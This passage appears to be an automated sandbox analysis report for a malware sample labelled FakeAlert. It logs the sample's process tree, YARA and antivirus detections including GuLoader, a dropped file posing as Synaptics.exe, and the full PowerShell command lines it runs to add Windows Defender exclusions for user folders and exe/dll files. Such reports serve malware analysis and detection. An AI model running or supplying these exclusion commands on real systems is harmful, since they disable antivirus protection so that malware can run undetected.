                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OZXwLsWdbx9tuEnwWvFN0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:21 UTC31INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:21 UTC31INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Statistics

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:04:37:41
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1490944 bytes
                                                                                                                                                                                  MD5 hash:C5BF732066AB84D1ABBA5B27638A5191
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                  Start time:04:37:41
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                                                                                                                  Imagebase:0xc20000
                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:04:37:42
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                  Start time:04:37:42
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                                                                                                                                                                  Imagebase:0xc20000
                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:04:37:42
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                                                                                                                  Imagebase:0x1010000
                                                                                                                                                                                  File size:430592 bytes
                                                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                  Start time:04:37:43
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:04:37:43
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:1270272 bytes
                                                                                                                                                                                  MD5 hash:FEDAD1ADEC8A1D90444051B5BDC6445D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:04:37:48
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\._cache_uniformerede.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:498497 bytes
                                                                                                                                                                                  MD5 hash:C4B2332489C0BA3E3F2A262F1C2C31B8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:04:37:50
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:771584 bytes
                                                                                                                                                                                  MD5 hash:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.348826366.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.285408477.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.361096693.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:04:37:54
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                                                                                                  Imagebase:0x1010000
                                                                                                                                                                                  File size:430592 bytes
                                                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:04:38:02
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:771584 bytes
                                                                                                                                                                                  MD5 hash:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000000.310907115.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:04:38:06
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                  Imagebase:0x1130000
                                                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                  Start time:04:38:32
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:434592 bytes
                                                                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:04:38:39
                                                                                                                                                                                  Start date:27/05/2022
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:434592 bytes
                                                                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  No disassembly